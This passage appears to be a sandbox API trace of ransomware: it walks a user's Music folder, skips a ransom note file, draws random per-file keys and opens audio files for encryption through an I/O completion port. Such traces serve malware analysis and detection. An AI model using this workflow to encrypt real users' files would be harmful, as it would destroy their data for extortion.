param_1=0x19ed32, param_2="%02X" | out: param_1="45") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="A2") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="23") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="3F") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="AB") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="7B") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="9D") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="8C") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="02") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="8C") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="A0") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="4D") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="F4") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="28") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="A5") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="A4") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="6D") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="22") returned 2 [0124.565] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\dpTDqU7W8QtcX-Gy.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\dpTDqU7W8QtcX-Gy.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\dpTDqU7W8QtcX-Gy.wav" [0124.565] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.565] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.565] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeead9130, ftCreationTime.dwHighDateTime=0x1d7023a, ftLastAccessTime.dwLowDateTime=0xbb4aa700, ftLastAccessTime.dwHighDateTime=0x1d7066e, ftLastWriteTime.dwLowDateTime=0xbb4aa700, ftLastWriteTime.dwHighDateTime=0x1d7066e, nFileSizeHigh=0x0, nFileSizeLow=0x9270, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Gi2cuxKqz.m4a", cAlternateFileName="GI2CUX~1.M4A")) returned 1 [0124.565] StrStrIW (lpFirst="Gi2cuxKqz.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.565] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\Gi2cuxKqz.m4a") returned 45 [0124.565] PathFindExtensionW (pszPath="Gi2cuxKqz.m4a") returned=".m4a" [0124.565] lstrlenW (lpString=".m4a") returned 4 [0124.565] PathFindExtensionW (pszPath="Gi2cuxKqz.m4a") returned=".m4a" [0124.565] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\Gi2cuxKqz.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\gi2cuxkqz.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.565] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=37488) returned 1 [0124.566] GetProcessHeap () returned 0x600000 [0124.566] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.568] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="FC") returned 2 [0124.568] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="45") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="7B") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="08") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="97") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="60") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="42") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="04") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="2B") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="A5") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="70") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="D4") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="E6") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="1A") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="52") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="30") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="81") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="0E") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="DC") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="BC") returned 2 [0124.568] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="8D") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="CD") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="64") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="87") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="E7") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="DA") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="95") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="CA") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="E4") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="BE") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="F7") returned 2 [0124.569] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="17") returned 2 [0124.569] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\Gi2cuxKqz.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\Gi2cuxKqz.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\Gi2cuxKqz.m4a" [0124.569] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.569] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.569] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ba077e0, ftCreationTime.dwHighDateTime=0x1d7080b, ftLastAccessTime.dwLowDateTime=0x34de7390, ftLastAccessTime.dwHighDateTime=0x1d70862, ftLastWriteTime.dwLowDateTime=0x34de7390, ftLastWriteTime.dwHighDateTime=0x1d70862, nFileSizeHigh=0x0, nFileSizeLow=0x16272, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="j4TOE--GjIhBPgIUNOV3.wav", cAlternateFileName="J4TOE-~1.WAV")) returned 1 [0124.569] StrStrIW (lpFirst="j4TOE--GjIhBPgIUNOV3.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.569] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\j4TOE--GjIhBPgIUNOV3.wav") returned 56 [0124.569] PathFindExtensionW (pszPath="j4TOE--GjIhBPgIUNOV3.wav") returned=".wav" [0124.570] lstrlenW (lpString=".wav") returned 4 [0124.570] PathFindExtensionW (pszPath="j4TOE--GjIhBPgIUNOV3.wav") returned=".wav" [0124.570] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\j4TOE--GjIhBPgIUNOV3.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\j4toe--gjihbpgiunov3.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0124.570] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=90738) returned 1 [0124.570] GetProcessHeap () returned 0x600000 [0124.570] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0124.573] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="AC") returned 2 [0124.573] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="D2") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="F7") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="D1") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="58") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="19") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="0F") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="18") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="07") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="7E") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="E7") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="51") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="17") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="4A") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="79") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D4") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="05") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="5F") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="7B") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="29") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="C9") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="87") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="EE") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="9C") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="9B") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="6D") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="36") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="22") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="68") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="E7") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="7E") returned 2 [0124.573] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="6D") returned 2 [0124.574] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\j4TOE--GjIhBPgIUNOV3.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\j4TOE--GjIhBPgIUNOV3.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\j4TOE--GjIhBPgIUNOV3.wav" [0124.574] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.574] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0124.574] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed49a620, ftCreationTime.dwHighDateTime=0x1d70213, ftLastAccessTime.dwLowDateTime=0x383059f0, ftLastAccessTime.dwHighDateTime=0x1d70a60, ftLastWriteTime.dwLowDateTime=0x383059f0, ftLastWriteTime.dwHighDateTime=0x1d70a60, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="pbC7nvlKsqbOTxeWZv9", cAlternateFileName="PBC7NV~1")) returned 1 [0124.574] StrStrIW (lpFirst="pbC7nvlKsqbOTxeWZv9", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.574] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9") returned 51 [0124.574] GetProcessHeap () returned 0x600000 [0124.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0124.602] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9" [0124.602] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\*" [0124.602] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed49a620, ftCreationTime.dwHighDateTime=0x1d70213, ftLastAccessTime.dwLowDateTime=0x383059f0, ftLastAccessTime.dwHighDateTime=0x1d70a60, ftLastWriteTime.dwLowDateTime=0x383059f0, ftLastWriteTime.dwHighDateTime=0x1d70a60, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName=".", cAlternateFileName="")) returned 0x626878 [0124.602] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed49a620, ftCreationTime.dwHighDateTime=0x1d70213, ftLastAccessTime.dwLowDateTime=0x383059f0, ftLastAccessTime.dwHighDateTime=0x1d70a60, ftLastWriteTime.dwLowDateTime=0x383059f0, ftLastWriteTime.dwHighDateTime=0x1d70a60, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="..", cAlternateFileName="")) returned 1 [0124.602] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebdfd10, ftCreationTime.dwHighDateTime=0x1d7006d, ftLastAccessTime.dwLowDateTime=0xfa3fca80, ftLastAccessTime.dwHighDateTime=0x1d70448, ftLastWriteTime.dwLowDateTime=0xfa3fca80, ftLastWriteTime.dwHighDateTime=0x1d70448, nFileSizeHigh=0x0, nFileSizeLow=0xe571, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="0tVeU 3iTyrR -c.mp3", cAlternateFileName="0TVEU3~1.MP3")) returned 1 [0124.602] StrStrIW (lpFirst="0tVeU 3iTyrR -c.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.602] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\0tVeU 3iTyrR -c.mp3") returned 71 [0124.602] PathFindExtensionW (pszPath="0tVeU 3iTyrR -c.mp3") returned=".mp3" [0124.602] lstrlenW (lpString=".mp3") returned 4 [0124.602] PathFindExtensionW (pszPath="0tVeU 3iTyrR -c.mp3") returned=".mp3" [0124.602] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\0tVeU 3iTyrR -c.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\0tveu 3ityrr -c.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.603] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=58737) returned 1 [0124.603] GetProcessHeap () returned 0x600000 [0124.603] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.604] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="2D") returned 2 [0124.604] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="B2") returned 2 [0124.604] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="21") returned 2 [0124.604] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="98") returned 2 [0124.604] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="FA") returned 2 [0124.604] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="82") returned 2 [0124.604] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="45") returned 2 [0124.604] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="30") returned 2 [0124.604] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="58") returned 2 [0124.604] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="59") returned 2 [0124.604] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="CE") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="DE") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="E0") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="63") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="17") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="01") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="2B") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="10") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="B6") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="55") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="F4") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="AD") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="B1") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="8A") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="D4") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="28") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="49") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="1F") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="31") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="BC") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="5F") returned 2 [0124.605] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="62") returned 2 [0124.606] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\0tVeU 3iTyrR -c.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\0tVeU 3iTyrR -c.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\0tVeU 3iTyrR -c.mp3" [0124.606] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.606] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.606] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46480bb0, ftCreationTime.dwHighDateTime=0x1d6fa51, ftLastAccessTime.dwLowDateTime=0x44e18570, ftLastAccessTime.dwHighDateTime=0x1d70a79, ftLastWriteTime.dwLowDateTime=0x44e18570, ftLastWriteTime.dwHighDateTime=0x1d70a79, nFileSizeHigh=0x0, nFileSizeLow=0xc87, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="dtsKxQLk8egoL7tj.m4a", cAlternateFileName="DTSKXQ~1.M4A")) returned 1 [0124.606] StrStrIW (lpFirst="dtsKxQLk8egoL7tj.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.606] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\dtsKxQLk8egoL7tj.m4a") returned 72 [0124.606] PathFindExtensionW (pszPath="dtsKxQLk8egoL7tj.m4a") returned=".m4a" [0124.606] lstrlenW (lpString=".m4a") returned 4 [0124.606] PathFindExtensionW (pszPath="dtsKxQLk8egoL7tj.m4a") returned=".m4a" [0124.606] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\dtsKxQLk8egoL7tj.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\dtskxqlk8egol7tj.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.607] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=3207) returned 1 [0124.607] GetProcessHeap () returned 0x600000 [0124.607] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.607] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="3E") returned 2 [0124.607] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="A4") returned 2 [0124.607] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="DF") returned 2 [0124.607] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="30") returned 2 [0124.607] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="90") returned 2 [0124.607] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="BE") returned 2 [0124.607] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="AD") returned 2 [0124.607] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="6B") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="9A") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="01") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="95") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="93") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="71") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="D5") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="69") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="00") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="6D") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="28") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="95") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="22") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="BD") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="C2") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="D5") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="55") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="1C") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="9C") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="5B") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="08") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="EF") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="32") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="FD") returned 2 [0124.608] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="5A") returned 2 [0124.609] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\dtsKxQLk8egoL7tj.m4a" | out: 